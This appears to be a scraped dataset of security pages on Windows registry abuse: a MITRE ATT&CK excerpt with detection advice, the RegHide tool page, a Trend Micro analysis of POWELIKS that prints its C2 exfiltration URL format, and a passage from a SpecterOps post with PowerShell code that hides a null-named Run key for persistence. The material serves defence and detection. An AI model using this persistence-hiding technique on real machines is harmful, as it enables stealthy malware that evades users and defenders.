encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll and HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs. [29] Ursnif Ursnif has used Registry modifications as part of its installation routine. [50] [51] Volgmer Volgmer stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security. [15] [16] Zeus Panda Zeus Panda modifies several Registry keys under HKCU\\Software\\Microsoft\\Internet Explorer\\ PhishingFilter\\ to disable phishing filters. [42] zwShell zwShell can modify the Registry. [17] Detection Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). [64] Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file. Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. [2] Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns [4] and RegDelNull [65]. References Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015. Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018. Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018. Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018. Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015. MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV\xe2\x80\x99s Radar. Retrieved February 15, 2017. US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017. US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018. Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018. McAfee\xc2\xae Foundstone\xc2\xae Professional Services and McAfee Labs\xe2\x84\xa2. (2011, February 10). Global Energy Cyberattacks: \xe2\x80\x9cNight Dragon\xe2\x80\x9d. Retrieved February 19, 2018. Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018. Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017. Ray, V., Hayashi, K. (2016, February 29). New Malware \xe2\x80\x98Rover\xe2\x80\x99 Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016. Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018. Hromcov\xc3\xa1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018. The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018. Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018. Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. US-CERT. (2018, June 14). MAR-10135536-12 \xe2\x80\x93 North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. Ivanov, A. et al.. (2018, May 7). SynAck targeted ransomware uses the Doppelg\xc3\xa4nging technique. Retrieved May 22, 2018. Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018. Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018. Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017. FireEye. (2015). APT28: A WINDOW INTO RUSSIA\xe2\x80\x99S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018. Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018. US-CERT. (2018, August 09). MAR-10135536-17 \xe2\x80\x93 North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. US-CERT. (2019, April 10). MAR-10135536-8 \xe2\x80\x93 North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019. Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: ""njRAT"" Uncovered. Retrieved June 4, 2019. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019. Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019. ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018. Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda \xe2\x80\x93 A potential new malicious tool. Retrieved June 25, 2018. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018. Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019. Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019. Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018. Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Reghide - Windows Sysinternals | Microsoft Docs Skip to main content Contents Exit focus mode Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Reghide 01/11/2006 2 minutes to read In this article Published: November 1, 2006 Download RegHide (38 KB) Run now from Sysinternals Live. Introduction A subtle but significant difference between the Win32 API and the Native API (see Inside the Native API for more information on this largely undocumented interface) is the way that names are described. In the Win32 API strings are interpreted as NULL-terminated ANSI (8-bit) or wide character (16-bit) strings. In the Native API names are counted Unicode (16-bit) strings. While this distinction is usually not important, it leaves open an interesting situation: there is a class of names that can be referenced using the Native API, but that cannot be described using the Win32 API. Download RegHide (38 KB) Run now from Sysinternals Live. Runs on: Client: Windows Vista and higher. Server: Windows Server 2008 and higher. Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"POWELIKS: Malware Hides In Windows Registry - TrendLabs Security Intelligence Blog Trend Micro About TrendLabs Security Intelligence Blog Search: Go to\xe2\x80\xa6 Home Categories - \xc2 \xc2 Ransomware - \xc2 \xc2 Vulnerabilities - \xc2 \xc2 Exploits - \xc2 \xc2 Targeted Attacks - \xc2 \xc2 Deep Web - \xc2 \xc2 Mobile - \xc2 \xc2 Internet of Things - \xc2 \xc2 Malware - \xc2 \xc2 Bad Sites - \xc2 \xc2 Spam - \xc2 \xc2 Botnets - \xc2 \xc2 Social - \xc2 \xc2 Open source Home Categories Ransomware Vulnerabilities Exploits Targeted Attacks Deep Web Mobile Internet of Things Malware Bad Sites Spam Botnets Social Open source Home \xc2 \xc2 \xc2\xbb\xc2 \xc2 Malware \xc2 \xc2 \xc2\xbb\xc2 \xc2 POWELIKS: Malware Hides In Windows Registry POWELIKS: Malware Hides In Windows Registry Posted on:August 1, 2014 at 4:50 am Posted in:Malware Author: Roddell Santos (Threats Analyst) 2 We spotted a malware that hides all its malicious codes in the Windows Registry. The said tactic provides evasion and stealth mechanisms to the malware, which Trend Micro detects as TROJ_POWELIKS.A. \xc2 When executed, TROJ_POWELIKS.A downloads files, which can cause further system infection.\xc2 Systems affected by this malware risk being infected by other malware, thus causing further system infection. In addition, it has the capability to steal system information, which may be used by cybercriminals to launch other attacks. Evasion Mechanism Apart from stealth mechanism, this may also provide difficulty in forensics because there are no file references. As much as possible, threats tried to avoid being detected in the system and network in order to instigate more malicious activities. Based on our analysis, TROJ_POWELIKS checks if Windows PowerShell is installed on the affected system, if not, it downloads and installs it to the infected system.\xc2 This will be used later to execute the encoded script file. As such, PowerShell runs the encoded script containing the malware\xe2\x80\x99s executable code (which is also a .DLL) responsible for downloading other malicious files onto the infected system. This technique is done as part of its evasion tactic since it will not be directly executed by windows or any application. It then creates a blank or NULL Autostart entry using the API ZwSetValueKey: This is not necessarily a new feature and is documented in\xc2 MSDN. Through a NULL registry value, users cannot see the content of the registry key with null value. Although there is an option to delete the registry key, deleting it will just result to an error due to the null value. However, the specific data will still execute during the system\xe2\x80\x99s restart without any problem. To put simply, users cannot see and therefore, delete the entry thus when they reboot the system, the malware will still run. It also creates another registry entry that contains the malware code.\xc2 This created registry data is shown below: This registry data is an encoded file. After several decoding, a .DLL file can be found in the following code: This .DLL file is then injected in the normal DLLHOST.EXE process.\xc2 The injected code is capable of downloading other malware, thus compromising the security of the system. It also steals the following information from the affected system: Operating system and architecture UUID Malware version Build date This information is then sent via POST command using the following format: http://178[dot]89[dot]159[dot]34/q/type={status: start, install, exist, cmd or low}&version=1.0&aid={id}&builddate=%s&id={iuuid}&os={OS version}_{OS architecture} We detect the .EXE and .DLL files as TROJ_POWELIKS.A and the encoded script as JS_POWELIKS.A. The hashes used in this threat are: EXE \xe2\x80\x93 BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A DLL \xe2\x80\x93 3506CE5C88EE880B404618D7759271DED72453FE Impact to the Threat Landscape Cybercriminals often use new tactics and techniques to avoid being detected in the system and remain under the radar. These tactics can be from simple hidden file attributes to the more advance rootkit technology. In the past, we blogged about attacks that exhibit various notable evasion tactics: use of Tor network the abuse of Windows PowerShell feature averting the execution of analysis tools disguising network traffic domain generation algorithm (DGA) tactics seen in DOWNAD Notable malware like EMOTET and MORTO also employed the same tactic of leveraging the registry. EMOTET, which sniffs network activity for information theft, has its PE component in the registry. \xc2 In addition, its (EMOTET) downloaded files are located in the entries. The encrypted stolen information is also stored in the registry entry. On the other hand, MORTO\xc2 was encrypted in the registry. While routine of abusing Windows registry is no longer new, it may indicate that cybercriminals and attackers are continuously improving their \xe2\x80\x98arsenal\xe2\x80\x99 or malware so as to go undetected and to instigate more malicious activities without the user\xe2\x80\x99s knowledge. The use of registry for evasion tactics is crucial given that file-based AV solution won\xe2\x80\x99t be able to detect anything malicious running on the system. Furthermore, unsuspecting users won\xe2\x80\x99t necessarily check for the registries but rather look for suspicious files or folders. \xc2 We surmise that in the future, we may see other malware sporting the same routines as AV security continuous to grow. Trend Micro protects users from this threat via its Smart Protection Network that detects the malicious file despite its evasion tactics. With additional analysis from Rhena Inocencio Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware: ENTERPRISE \xc2\xbb SMALL BUSINESS\xc2\xbb HOME\xc2\xbb Tags: powerlikswindows registry Featured Stories systemd Vulnerability Leads to Denial of Service on Linux qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability A Closer Look at North Korea\xe2\x80\x99s Internet From Cybercrime to Cyberpropaganda Security Predictions for 2019 Our security predictions for 2019 are based on our experts\xe2\x80\x99 analysis of the progress of current and emerging technologies, user behavior, and market trends, and their impact on the threat landscape. We have categorized them according to the main areas that are likely to be affected, given the sprawling nature of the technological and sociopolitical changes under consideration. Read our security predictions for 2019. Business Process Compromise Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise. Recent Posts When PSD2 Opens More Doors: The Risks of Open Banking Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload Hacking LED Wristbands: A \xe2\x80\x98Lightning\xe2\x80\x99 Recap of RF Security Basics From BinDiff to Zero-Day: A Proof of Concept Exploiting CVE-2019-1208 in Internet Explorer September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days Popular Posts TA505 At It Again: Variety is the Spice of ServHelper and FlawedAmmyy BlackSquid Slithers Into Servers and Drives With 8 Notorious Exploits to Drop XMRig Miner Adware Posing as 85 Photography and Gaming Apps on Google Play Installed Over 8 Million Times Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response Latest Spam Campaigns from TA505 Now Using New Malware Tools Gelup and FlowerPippi Stay Updated Email Subscription Subscribe Home and Home Office | For Business | Security Intelligence | About Trend Micro Asia Pacific Region (APAC): Australia / New Zealand, \xe4\xb8\xad\xe5\x9b\xbd, \xe6\x97\xa5\xe6\x9c\xac, \xeb\x8c\x80\xed\x95\x9c\xeb\xaf\xbc\xea\xb5\xad, \xe5\x8f\xb0\xe7\x81\xa3 Latin America Region (LAR): Brasil, M\xc3\xa9xico North America Region (NABU): United States, Canada Europe, Middle East, & Africa Region (EMEA): France, Deutschland / \xc3\x96sterreich / Schweiz, Italia, \xd0 \xd0\xbe\xd1\x81\xd1\x81\xd0\xb8\xd1\x8f, Espa\xc3\xb1a, United Kingdom / Ireland Privacy Statement Legal Policies Copyright \xc2\xa9 Trend Micro Incorporated. All rights reserved.","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Sign in Get started Posts By SpecterOps Team Members ABOUT ALL POSTS SPECTEROPS.IO Hiding Registry keys with PSReflect Brian Reitz Brian Reitz Follow Jul 14, 2017 \xc2\xb7 7 min read Introduction and Background Recently, I wanted to test detection of different kinds of registry persistence used by malware and APT groups. The Windows registry is a particularly interesting area for blue team detection as \xe2\x80\x9cfileless\xe2\x80\x9d techniques become more prevalent. One technique that has stuck in my mind is a persistence trick used by the Kovter malware family as detailed in a September 2015 report from Symantec, and analyzed by MalwareBytes, Airbus Cybersecurity, and Reaqta. Kovter and its predecessor Poweliks use mshta to execute code stored in registry keys and values. To persist between reboots, Kovter uses a Run key value, but with a small twist: the key value name starts with a null character (\\0), followed by random chars. The null character causes an error when attempting to read the value with Regedit and other techniques that expect a null-terminated string. Using a null-character in a value name to hide from Regedit has been known since at least 2005, and Mark Russinovich previously released a tool called RegHide as part of the Sysinternals Suite as a proof of concept. The old Sysinternals page described why this null character trick worked: \xe2\x80\x9cIn the Win32 API strings are interpreted as NULL-terminated ANSI (8-bit) or wide character (16-bit) strings. In the Native API names are counted Unicode (16-bit) strings. While this distinction is usually not important, it leaves open an interesting situation: there is a class of names that can be referenced using the Native API, but that cannot be described using the Win32 API. [\xe2\x80\xa6] When a key (or any other object with a name such as a named Event, Semaphore or Mutex) is created with such a name any applications using the Win32 API will be unable to open the name, even though they might seem to see it.\xe2\x80\x9d A question from StackOverflow was also extremely helpful explaining the differences between calling the Win32 API and calling the Native API. Regedit will show an error when trying to display a key value with a null character in its name. With PSReflect, we can make calls to the Native API through ntdll.dll from a PowerShell script, so we can implement our own version of RegHide and test our detection capability for Kovter-style key value names. To follow along with the completed script, check out the PSReflect-RegHide gist or scroll to the bottom. Enumerations, structures, and function definitions As a proof of concept, let\xe2\x80\x99s create a Run key like Kovter: we\xe2\x80\x99ll create a value under HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, with a value name of \xe2\x80\x9c\\0abcd\xe2\x80\x9d, and a value of \xe2\x80\x9cmshta javascript:alert(1)\xe2\x80\x9d, which should pop up an alert box on user logon. According to the MSDN article about Registry Key Object Routines, we\xe2\x80\x99ll need at least three calls to write our hidden key value: first, NtOpenKey to open a handle to the key, second, NtSetValueKey to write the key value, and finally NtClose to close the key handle. PSReflect provides helpful functions to easily translate the documented C++ code into PowerShell. We\xe2\x80\x99ll define the enums and structs necessary to make these function calls first. Using MSDN, we can see that NtOpenKey requires the ACCESS_MASK enum and the OBJECT_ATTRIBUTES struct (which itself requires an ATTRIBUTES enum), and NtSetValueKey requires the UNICODE_STRING struct. Let\xe2\x80\x99s look at how to convert UNICODE_STRING into a PSReflect struct. We can \xe2\x80\x9ctranslate\xe2\x80\x9d the C++ data types into PowerShell types, so a USHORT, an unsigned short (16-bit int), becomes a UInt16, and a pointer to a WSTR becomes an IntPtr. For the ACCESS_MASK enum, the DWORD becomes a UInt32. # Define our structs. # https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx # typedef struct _UNICODE_STRING { # USHORT Length; # USHORT MaximumLength; # PWSTR Buffer; # } $UNICODE_STRING = struct $Module UNICODE_STRING @{ Length = field 0 UInt16 MaximumLength = field 1 UInt16 Buffer = field 2 IntPtr } # And our ACCESS_MASK $KEY_ACCESS = psenum $Module KEY_ACCESS UInt32 @{ KEY_QUERY_VALUE = 0x0001 KEY_SET_VALUE = 0x0002 KEY_CREATE_SUB_KEY = 0x0004 KEY_ENUMERATE_SUB_KEYS = 0x0008 KEY_NOTIFY = 0x0010 KEY_CREATE_LINK = 0x0020 KEY_WOW64_64KEY = 0x0100 KEY_WOW64_32KEY = 0x0200 KEY_WRITE = 0x20006 KEY_READ = 0x20019 KEY_EXECUTE = 0x20019 KEY_ALL_ACCESS = 0xF003F } -Bitfield Next, we\xe2\x80\x99ll define the functions that we want to import from ntdll to write to the Registry. Let\xe2\x80\x99s look at NtOpenKey, NtSetValueKey, and NtClose. We specify the DLL name, ntdll, and the entrypoint for the exported function we want, such as NtOpenKey. Again, we can \xe2\x80\x9ctranslate\xe2\x80\x9d the types from the C++ code documented on MSDN into the equivalent PowerShell. HANDLE becomes IntPtr and ULONG becomes UInt32, while for pointer types such as PHANDLE and PUNICODE_STRING, we can use MakeByRefType() to properly pass by reference. Notice that we can use the structs we defined previously (such as UNICODE_STRING). $FunctionDefinitions = @( (func ntdll NtOpenKey ([UInt32]) @( [IntPtr].MakeByRefType(), #_Out_ PHANDLE KeyHandle, [Int32], #_In_ ACCESS_MASK DesiredAccess, $OBJECT_ATTRIBUTES.MakeByRefType() #_In_ POBJECT_ATTRIBUTES ObjectAttributes ) -EntryPoint NtOpenKey), (func ntdll NtSetValueKey ([UInt32]) @( [IntPtr], #_In_ HANDLE KeyHandle, $UNICODE_STRING.MakeByRefType(), #_In_ PUNICODE_STRING ValueName, [Int32], #_In_opt_ ULONG TitleIndex, [Int32], #_In_ ULONG Type, [IntPtr], #_In_opt_ PVOID Data, [Int32] #_In_ ULONG DataSize ) -EntryPoint NtSetValueKey), (func ntdll NtClose ([UInt32]) @( [IntPtr] #_In_ HANDLE ObjectHandle ) -EntryPoint NtClose), ) $Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace RegHide $ntdll = $Type['ntdll'] After calling Add-Win32Type, we now have access to these Native API functions in PowerShell as PowerShell Methods: PS C:\\Users\\brian> $ntdll::NtOpenKey | fl MemberType : Method OverloadDefinitions : {static uint32 NtOpenKey([ref] System.IntPtr , int , [ref] OBJECT_ATTRIBUTES )} TypeNameOfValue : System.Management.Automation.PSMethod Value : static uint32 NtOpenKey([ref] System.IntPtr , int , [ref] OBJECT_ATTRIBUTES ) Name : NtOpenKey IsInstance : True Creating the Autorun key Let\xe2\x80\x99s set up the necessary arguments to open a key. While making a KeyHandle (an empty IntPtr) and an ACCESS_MASK (an Int32) is straightforward, creating an OBJECT_ATTRIBUTES struct takes a bit of set up that is normally handled by a macro. Let\xe2\x80\x99s take care of the easy stuff first: # Create our OBJECT_ATTRIBUTES structure # We don\xe2\x80\x99t have the InitializeObjectAttributes macro, but we can do it manually $ObjectAttributes = [Activator]::CreateInstance($OBJECT_ATTRIBUTES) $ObjectAttributes.Length = $OBJECT_ATTRIBUTES::GetSize() $ObjectAttributes.RootDirectory = [IntPtr]::Zero $ObjectAttributes.Attributes = $OBJ_ATTRIBUTE::OBJ_CASE_INSENSITIVE # These are set to NULL for default Security Settings (mirrors the InitializeObjectAttributes macro). $ObjectAttributes.SecurityDescriptor = [IntPtr]::Zero $ObjectAttributes.SecurityQualityOfService = [IntPtr]::Zero Our ObjectName specifies the registry key we want to open, i.e. HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. The object name for HKCU is in the format \\Registry\\User\\\\, so we\xe2\x80\x99ll have to insert the correct User SID and create a UNICODE_STRING. The ObjectName field takes a pointer to a UNICODE_STRING, so we\xe2\x80\x99ll have to create a pointer to the UNICODE_STRING as well. # To open the Current User\xe2\x80\x99s registry hive, we need the user\xe2\x80\x99s SID $SID = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value $KeyName = ""\\Registry\\User\\$SID\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"" # We'll have to convert the KeyName from PowerShell string into a UNICODE_STRING $KeyBuffer = [Activator]::CreateInstance($UNICODE_STRING) $ntdll::RtlInitUnicodeString([ref]$KeyBuffer, $KeyName) # Here, we need a pointer to the UNICODE_STRING we created previously. $ObjectAttributes.ObjectName = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($UNICODE_STRING::GetSize()) [System.Runtime.InteropServices.Marshal]::StructureToPtr($KeyBuffer, $ObjectAttributes.ObjectName, $true) Now we have all the arguments needed, so we can make a call to $ntdll:NtOpenKey. $status = $ntdll::NtOpenKey([ref]$KeyHandle, $DesiredAccess, [ref]$ObjectAttributes) Once we have a key handle opened, we can pass that $KeyHandle to other functions such as NtSetValueKey or NtClose. Closing our handle is a simple call: $status = $ntdll::NtClose($KeyHandle) After we open the key handle to the Run key, our next step is to add the hidden value key, so that our \xe2\x80\x9cpayload\xe2\x80\x9d runs at logon. To call NtSetValueKey, we\xe2\x80\x99ll need our key handle, plus the Value Name, its Type, and the Value Data. While we previously used RtlInitUnicodeString to initialize our UNICODE_STRINGs, here we will manually create the structure to put a null character in the string. RtlInitUnicodeString, like other Win32 API calls, searches for the null-terminator (\\0) to determine the end (and the length) of a string, but here we manually specify the length of the string and its buffer, so we can put in whatever characters we\xe2\x80\x99d like in our value name. $ValueName = ""`0abcd"" $ValueData = ""mshta javascript:alert(1)"" $ValueNameBuffer = [Activator]::CreateInstance($UNICODE_STRING) $ValueDataBuffer = [Activator]::CreateInstance($UNICODE_STRING) # Allocate enough space for 2-byte wide characters $ValueNameBuffer.Length = $ValueName.Length * 2 $ValueNameBuffer.MaximumLength = $ValueName.Length * 2 $ValueNameBuffer.Buffer = [System.Runtime.InteropServices.Marshal]::StringToCoTaskMemUni($ValueName) # ValueData doesn't have any `0 characters, so we're good to use RtlInitUnicodeString $ntdll::RtlInitUnicodeString([ref]$ValueDataBuffer, $ValueData) # Fill out the remaining parameters for NtSetValueKey $ValueType = 0x00000001 # REG_SZ Value Type # ""Device and intermediate drivers should set TitleIndex to zero."" $TitleIndex = 0 $status = $ntdll::NtSetValueKey($KeyHandle, [ref]$ValueNameBuffer, $TitleIndex, $ValueType, $ValueDataBuffer.Buffer, $ValueDataBuffer.Length) After calling NtSetValueKey with our arguments, our hidden Run key is created. RegEdit will throw an error when viewing the key, while reg query and PowerShell\xe2\x80\x99s Get-ItemProperty won\xe2\x80\x99t return a value hidden in this way. However, using the Autoruns tool from Sysinternals, we can see (and delete) the value we just created: Conclusion So why bother implementing a trick to obfuscate a registry value that isn\xe2\x80\x99t truly hidden? In my opinion it\xe2\x80\x99s important to examine what techniques various malware and APT tools use, as well as their implementations, so we can understand exactly how to detect and remediate these TTPs. While writing a registry key value name with a null character is a relatively simple example, it\xe2\x80\x99s also a good introduction to how PSReflect makes Native and Win32 API access easy in PowerShell. I wrote the rest of the NtXxxKey routines (NtCreateKey, NtQueryKey, NtQueryValueKey, NtEnumerateKey, NtEnumerateValueKey, NtDeleteKey, and NtDeleteValueKey) and added them to the PSReflect-Functions repo, which maintains a growing number of useful Win32 functions as a PowerShell module. Full source of 